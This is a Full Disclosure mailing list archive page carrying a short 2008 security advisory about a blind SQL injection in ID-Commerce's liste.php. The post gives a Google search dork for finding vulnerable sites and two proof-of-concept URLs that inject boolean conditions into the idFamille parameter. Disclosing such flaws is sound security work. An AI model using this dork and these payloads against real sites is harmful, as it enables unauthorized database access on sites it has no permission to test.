Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

ID-Commerce Security Advisory - SLR-2007-001

From: "rlavertu" <romain.lavertu () sogeti com>
Date: Thu, 10 Jan 2008 15:23:35 +0100
Blind SQL injection :



google : inurl:'liste.php?idFamille='



http://URL/liste.php?idFamille=1%20or%201=1#

http://URL/liste.php?idFamille=1%20or%201=0#
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: